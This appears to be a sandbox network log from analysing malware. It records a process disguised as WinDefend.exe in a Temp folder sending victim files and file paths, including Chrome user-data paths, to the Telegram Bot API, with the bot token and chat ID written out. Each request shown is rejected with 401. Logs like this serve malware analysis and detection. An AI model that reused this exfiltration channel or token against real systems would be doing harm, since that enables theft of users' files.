2024-05-23 13:34:35 UTC	40	OUT	Data Raw: 2d 2d 31 38 39 63 31 66 32 61 2d 33 33 37 38 2d 34 63 33 39 2d 62 38 35 31 2d 30 38 63 66 66 66 33 36 61 62 35 30 0d 0a Data Ascii: --189c1f2a-3378-4c39-b851-08cfff36ab50
2024-05-23 13:34:35 UTC	155	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=apple-touch-icon-72x72-precomposed.png; filename*=utf-8''apple-touch-icon-72x72-precomposed.png
2024-05-23 13:34:35 UTC	3725	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 48 08 06 00 00 00 55 ed b3 47 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a c3 00 00 0a c3 01 34 29 24 ab 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 31 30 2f 33 30 2f 31 32 62 c2 cd 43 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 0d e5 49 44 41 54 78 9c ed 9c 7b 7c 55 d5 95 c7 bf e7 dc f7 cd 3b 04 12 20 90 68 4c 80 40 0a 01 82 3c 65 10 84 52 11 b4 1d ab ce 58 1f f5 55 eb d8 f1 51 c4 c2 50 3b 9f 29 b5 68 e9 28 60 75 60 64 2c 5a 0a be 18 1e ad c8 23 44 ca 4b 09 60 91 0a 84 47 32 04 6e 04 2e 89 49 c8 cd 4d ee b9 e7 f4 8f 70 d3 fb 38 af 7b 03 1f e6 53 58 Data Ascii: PNGIHDRHHUGsBIT\|dpHYs4)$tEXtCreation Time10/30/12bCtEXtSoftwareAdobe Fireworks CS6IDATx{\|U; hL@<eRXUQP;)h(`u`d,Z#DK`G2n.IMp8{SX
2024-05-23 13:34:35 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 38 39 63 31 66 32 61 2d 33 33 37 38 2d 34 63 33 39 2d 62 38 35 31 2d 30 38 63 66 66 66 33 36 61 62 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --189c1f2a-3378-4c39-b851-08cfff36ab50Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:35 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:35 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 38 39 63 31 66 32 61 2d 33 33 37 38 2d 34 63 33 39 2d 62 38 35 31 2d 30 38 63 66 66 66 33 36 61 62 35 30 2d 2d 0d 0a Data Ascii: --189c1f2a-3378-4c39-b851-08cfff36ab50--
2024-05-23 13:34:36 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	61099	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:35 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="61fcfbab-ba2e-4b25-a79b-34d1c637f3c1" Host: api.telegram.org Content-Length: 19912 Expect: 100-continue
2024-05-23 13:34:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:36 UTC	40	OUT	Data Raw: 2d 2d 36 31 66 63 66 62 61 62 2d 62 61 32 65 2d 34 62 32 35 2d 61 37 39 62 2d 33 34 64 31 63 36 33 37 66 33 63 31 0d 0a Data Ascii: --61fcfbab-ba2e-4b25-a79b-34d1c637f3c1
2024-05-23 13:34:36 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:34:36 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 79 90 5d 77 75 ef fb 59 eb b7 f7 3e 53 0f 9a 07 63 03 46 1e 40 36 b6 65 81 19 0c b8 05 1e 90 07 31 76 1b 07 48 08 09 36 24 b9 b9 b9 6f b8 55 af 5e ea f9 f8 56 bd 57 ef d5 7d 45 ea 91 84 c4 b9 c4 49 18 43 2b 60 c0 c6 60 30 91 08 60 20 91 00 1b 2c 06 83 cd 60 06 5b b2 c6 56 0f 67 ef df 6f bd 3f f6 3e a7 4f db 32 6a 49 dd ea 69 7f aa 8c b0 ce f1 e9 dd bf b3 f7 fa ad df fa ae 01 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a e6 1e 99 eb 0b 28 01 40 68 16 df c5 43 Data Ascii: PNGIHDR\rf IDATxy]wuY>ScF@6e1vH6$oU^VW}EIC+``0` ,`[Vgo?>O2jIiJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ(@hC
2024-05-23 13:34:36 UTC	4096	OUT	Data Raw: b6 df 3c a0 ab 67 40 91 53 05 98 3a de d0 aa bb 01 d9 42 06 4b bb 89 e8 92 37 00 9b ee d8 ba 5a 82 6c d3 6a b4 c1 7c c0 82 19 62 32 df d2 6d e1 d8 4d 44 e3 4a 5e 2d 18 27 d1 2c 14 0b b5 9b 7c e6 f9 08 c1 84 b1 20 5c d6 77 84 ab 56 1c ca 65 3f 28 0a 7e 66 a3 da 6f a6 30 03 51 ef 8d ac 65 21 aa ea 26 71 bc d1 76 50 85 8e b8 b2 24 59 9a 06 20 97 fd e4 cc e1 c1 9a 34 6a 7f 84 c8 e6 30 96 c1 02 5c 8f 10 02 b5 be 1a b5 de 1a 21 84 59 0b 6b 09 f9 6c bf 34 c0 f5 ab f7 b3 75 d5 7e d2 90 37 fe 5c 28 8b 66 80 74 2e d6 2e 03 de 62 0f 91 18 4b 57 16 5c 28 df dd cc b2 31 df da 56 c3 d9 62 bc c5 55 e3 95 21 0d 2d f2 b2 f5 79 11 f9 3f 16 dd 31 80 6e 77 3f 4e a2 dc 0b a8 c4 33 5c 2d 58 c8 7e 06 ad 20 24 62 bc 7c d9 08 2f ef 3f 42 25 f6 5d b2 df f1 66 fb cd 35 b9 2c 28 26 Data Ascii: <g@S:BK7Zlj\|b2mMDJ^-',\| \wVe?(~fo0Qe!&qvP$Y 4j0\!Ykl4u~7\(ft..bKW\(1VbU!-y?1nw?N3\-X~ $b\|/?B%]f5,(&
2024-05-23 13:34:36 UTC	4096	OUT	Data Raw: 41 e7 27 cc 47 b1 44 51 2c 6f 0a ea 36 49 93 c0 15 f3 ef 79 9b 4f 17 54 34 f9 dc 99 5d f2 c4 b6 97 08 0c 02 b5 22 b3 ba 23 ef d9 1f 91 00 00 20 00 49 44 41 54 75 95 ee ff a4 fb 2f 82 98 11 34 71 89 79 ff 7d af dc f1 e3 91 9e 8c 26 ca ad 3b 67 72 87 6e ef 5e 23 16 ec 6f c2 84 fd 54 1b 12 83 05 13 93 32 39 a8 4d f7 5c 85 62 3a 63 2c 2b 5d e0 f5 e3 f7 b0 41 b6 90 1d ff 33 4e 2f f3 c7 00 14 b7 cf c0 8e 81 28 22 be 49 23 f7 ea d0 f2 99 79 83 a2 c3 ef 52 df fd bb 13 9f da c1 50 04 e7 8f 4c 8c 89 ca 17 be 33 f4 a9 ef 30 b4 dd d3 64 b2 48 7a 06 10 21 dc 06 c8 16 b2 f8 6a be 20 c2 4e bc b5 da b3 17 ca e4 a0 0e c2 64 f7 20 f5 de c8 46 cd 47 09 d7 ba 44 df da 3e 02 cc a7 a3 c0 fc b8 90 66 11 58 be 99 f8 c8 6f fa ae 31 0b 97 6b e2 96 bc b8 f4 db 10 21 e0 30 97 38 0d Data Ascii: A'GDQ,o6IyOT4]"# IDATu/4qy}&;grn^#oT29M\b:c,+]A3N/("I#yRPL30dHz!j Nd FGD>fXo1k!08
2024-05-23 13:34:36 UTC	4096	OUT	Data Raw: d2 a7 c8 45 b6 83 65 00 27 72 14 98 9e 01 28 aa d4 ce f9 4f e7 24 d5 46 f2 1a c3 9e e5 27 32 13 41 cb 26 9f 39 53 12 9f 8c 20 2a 0e 03 6b f9 ef 7a c9 be f4 83 df fb d2 93 bc 7f 11 75 f9 99 61 a4 db c3 7c 0d 3f 41 c2 dd e9 98 3d 09 06 da ae 16 2c 67 0b 16 e4 c9 41 26 79 92 99 b7 80 c8 99 be c5 cb ac 59 4c 95 9c 66 5e c0 f4 0c c0 9e ed f9 a2 bf e4 dc 4a 08 5c 2e 70 a6 b5 7c f9 45 3c 03 06 99 d6 22 43 ec 88 a9 fb 8b 07 a2 da bf 03 2c 92 26 9f b3 cb 60 be 46 2e e2 9b 22 f6 d7 3e 70 34 ca e3 01 65 cc e4 58 18 c2 38 2a d8 19 26 bc 8c cd 54 01 a6 3b 55 68 5a 06 e0 9c 15 e7 38 80 9e b4 a2 26 72 89 d6 e2 9a 05 4b 43 e1 ec 96 ee ff 64 9b 2f 33 33 45 34 b4 7c 6a b0 6b 2c 0e 9f 67 68 7b ab 94 fd a6 87 08 b6 eb 76 62 d9 c2 be 48 c3 47 cd ec 67 78 34 0f 36 97 d9 81 93 Data Ascii: Ee'r(O$F'2A&9S kzua\|?A=,gA&yYLf^J\.p\|E<"C,&`F.">p4eX8&T;UhZ8&rKCd/33E4\|jk,gh{vbHGgx46
2024-05-23 13:34:36 UTC	3210	OUT	Data Raw: 30 da b4 75 fe 9c cc d7 c6 a2 ad 59 0f 40 0b 63 31 57 86 16 c6 55 f5 93 18 0d 3f 81 c7 11 ac 32 50 e8 61 5a 30 93 5b 4e 02 66 64 ac e0 6d 90 3c 78 f5 6f 0e be 5c e1 77 fa 00 00 0c 39 49 44 41 54 2f e3 30 f4 5e f7 0d 40 6f c2 dd 53 00 6a 14 9f a5 7d d3 80 3c 27 71 63 01 3a ef b5 d3 82 3d 8a c3 64 95 95 19 c9 dd 7f b8 54 82 67 3c c4 4e e6 6b e3 92 11 a6 60 52 28 45 cb 38 5e ba 1e 2f 5f 7d 37 56 4c 11 39 6e 26 01 c1 5e 05 a5 3a d3 7e b6 6c b4 57 67 fe 90 44 7e 7a f9 af a6 de 03 00 d4 ba fd 10 09 3d 32 00 3b 62 00 c0 ce 07 62 2b 78 08 1c 4f 2a 2f 4f 04 11 ea 61 1c 26 9b d7 37 4a a3 18 14 10 e4 7c 28 d2 9d cd 24 ee 0a b0 f1 68 55 00 82 e0 71 88 79 7f 14 07 46 77 e0 48 e5 ab 68 aa 00 86 c3 76 37 61 d7 eb d6 33 b3 fd 00 82 a7 88 89 e4 55 ad cf fc 7b 2b dd 47 40 Data Ascii: 0uY@c1WU?2PaZ0[Nfdm<xo\w9IDAT/0^@oSj}<'qc:=dTg<Nk`R(E8^/_}7VL9n&^:~lWgD~z=2;bb+xO*/Oa&7J\|($hUqyFwHhv7a3U{+G@
2024-05-23 13:34:36 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 31 66 63 66 62 61 62 2d 62 61 32 65 2d 34 62 32 35 2d 61 37 39 62 2d 33 34 64 31 63 36 33 37 66 33 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --61fcfbab-ba2e-4b25-a79b-34d1c637f3c1Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:36 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:36 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 31 66 63 66 62 61 62 2d 62 61 32 65 2d 34 62 32 35 2d 61 37 39 62 2d 33 34 64 31 63 36 33 37 66 33 63 31 2d 2d 0d 0a Data Ascii: --61fcfbab-ba2e-4b25-a79b-34d1c637f3c1--
2024-05-23 13:34:36 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	61100	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:36 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 159 Expect: 100-continue
2024-05-23 13:34:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:36 UTC	159	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 44 65 66 61 75 6c 74 49 44 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 49 44 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 44 65 66 61 75 6c 74 49 44 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 37 38 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+DefaultID.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CIDTemplates%5CENU%5CDefaultID.pdf%0ASize%3A+78+KB
2024-05-23 13:34:36 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	61101	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:36 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 177 Expect: 100-continue
2024-05-23 13:34:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:37 UTC	177	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 63 6c 6f 75 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 63 63 6c 6f 75 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+ccloud.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cccloud.png%0ASize%3A+2+KB
2024-05-23 13:34:37 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:37 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	61104	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:37 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:37 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+32.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:37 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:37 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	61103	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:37 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="19534887-ce91-4171-84c2-57443fed7b34" Host: api.telegram.org Content-Length: 80981 Expect: 100-continue
2024-05-23 13:34:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:37 UTC	40	OUT	Data Raw: 2d 2d 31 39 35 33 34 38 38 37 2d 63 65 39 31 2d 34 31 37 31 2d 38 34 63 32 2d 35 37 34 34 33 66 65 64 37 62 33 34 0d 0a Data Ascii: --19534887-ce91-4171-84c2-57443fed7b34
2024-05-23 13:34:37 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 65 66 61 75 6c 74 49 44 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 65 66 61 75 6c 74 49 44 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=DefaultID.pdf; filename*=utf-8''DefaultID.pdf
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 33 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 38 30 36 35 31 2f 4f 20 31 36 2f 45 20 39 38 34 38 2f 4e 20 31 2f 54 20 38 30 33 34 34 2f 48 20 5b 20 37 31 36 20 31 38 36 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 33 20 32 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 30 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 38 31 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 33 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 31 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 36 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 Data Ascii: %PDF-1.6%13 0 obj<</Linearized 1/L 80651/O 16/E 9848/N 1/T 80344/H [ 716 186]>>endobj xref13 210000000016 00000 n0000000902 00000 n0000000981 00000 n0000001132 00000 n0000001517 00000 n0000001563 00000 n000000
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: fa ab d9 6c 75 ef 0f 8f 60 29 18 84 51 7c 78 ee c9 93 af 3c 73 dc e1 b2 69 f9 26 78 6f e3 97 1b 7f dc db d9 69 17 80 ff 4d 2b 05 8d 89 aa 87 0e d7 eb b3 71 35 0c 1d 0e 7c 24 73 ca f5 82 89 f2 2c 1d f4 ba 9d 4e b7 37 02 1c 0b 16 17 51 a5 16 cf c4 b5 28 34 d6 ef 3b c8 9c 70 bd 60 a2 3c cf 92 41 af df 1f a4 23 c0 e0 01 ad e2 18 46 95 6a 01 e8 97 e0 31 d7 0b 26 cb b3 2c 49 92 c2 af bc bb 4c 68 19 63 0a 3f af 00 03 33 e3 7a c1 43 15 a7 b0 38 7e 07 77 67 bf b8 a6 a4 81 34 0d a4 79 3f f0 5f 01 06 00 cc 0b e4 bf 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 36 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 65 6e 67 74 68 20 32 36 31 3e 3e 73 74 72 65 61 6d 0d 0a ff ff ff fe fe fe fd fd fd fc fc fc fb fb fb fa fa fa f9 f9 f9 f8 f8 f8 f7 f7 f7 f6 f6 f6 f5 f5 f5 f4 Data Ascii: lu`)Q\|x<si&xoiM+q5\|$s,N7Q(4;p`<A#Fj1&,ILhc?3zC8~wg4y?_endstreamendobj26 0 obj<</Length 261>>stream
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: 48 62 35 e1 49 84 12 9b 89 70 22 82 d8 42 44 12 51 44 34 11 43 c4 93 47 08 47 1c 08 2e b7 13 e7 89 31 72 23 59 6d 63 63 b3 cb e6 b9 68 a5 28 48 54 25 9a 14 2f 11 a7 ec a8 36 0b 73 66 12 8f 6e 66 51 b5 58 a8 9c 8f b1 54 4a a1 16 8d d2 28 18 8e 49 60 56 8a 78 74 83 06 6b 61 a9 a7 2c d2 bd 6f e7 10 8c 70 2d 15 86 69 eb 0c 59 2b 99 0c d8 72 58 24 ec 02 3b 72 02 bc a0 17 02 45 13 b5 74 c5 a5 5b 15 3f 33 b0 14 88 ce b1 1f b9 fb 23 83 cf 80 76 85 45 c9 4f c3 87 d9 a1 c8 a0 d3 c8 99 09 0e ad 28 8d e3 c0 0b 91 74 ed d7 a7 6a 7b 19 58 32 13 82 78 03 87 02 7c 37 21 b6 86 3d 98 5f 5d 5b cc c9 d0 99 b6 fc f9 c0 02 2b bb 68 62 3e 90 fe 27 10 bc e6 03 29 59 96 fe af 8f f2 e1 d0 8b 07 6f 9c ba c0 13 56 c2 1a f9 61 41 0d fd 34 50 09 7f a2 f5 7e 5b 72 0f aa d9 4e 0f 49 6b Data Ascii: Hb5Ip"BDQD4CGG.1r#Ymcch(HT%/6sfnfQXTJ(I`Vxtka,op-iY+rX$;rEt[?3#vEO(tj{X2x\|7!=_][+hb>')YoVaA4P~[rNIk
2024-05-23 13:34:37 UTC	4096	OUT	Data Raw: 35 36 39 20 34 37 31 5d 2f 4e 61 6d 65 2f 4d 79 72 69 61 64 50 72 6f 2d 52 65 67 75 6c 61 72 2f 42 61 73 65 46 6f 6e 74 2f 4d 79 72 69 61 64 50 72 6f 2d 52 65 67 75 6c 61 72 2f 46 69 72 73 74 43 68 61 72 20 30 2f 45 6e 63 6f 64 69 6e 67 2f 57 69 6e 41 6e 73 69 45 6e 63 6f 64 69 6e 67 2f 54 79 70 65 2f 46 6f 6e 74 3e 3e 0d 65 6e 64 6f 62 6a 0d 35 20 30 20 6f 62 6a 0d 3c 3c 2f 53 74 65 6d 56 20 38 38 2f 46 6f 6e 74 4e 61 6d 65 2f 4d 79 72 69 61 64 50 72 6f 2d 52 65 67 75 6c 61 72 2f 46 6f 6e 74 53 74 72 65 74 63 68 2f 4e 6f 72 6d 61 6c 2f 46 6f 6e 74 46 69 6c 65 33 20 36 20 30 20 52 2f 46 6f 6e 74 57 65 69 67 68 74 20 34 30 30 2f 46 6c 61 67 73 20 33 32 2f 44 65 73 63 65 6e 74 20 2d 32 35 30 2f 46 6f 6e 74 42 42 6f 78 5b 2d 31 35 37 20 2d 32 35 30 20 31 31 Data Ascii: 569 471]/Name/MyriadPro-Regular/BaseFont/MyriadPro-Regular/FirstChar 0/Encoding/WinAnsiEncoding/Type/Font>>endobj5 0 obj<</StemV 88/FontName/MyriadPro-Regular/FontStretch/Normal/FontFile3 6 0 R/FontWeight 400/Flags 32/Descent -250/FontBBox[-157 -250 11
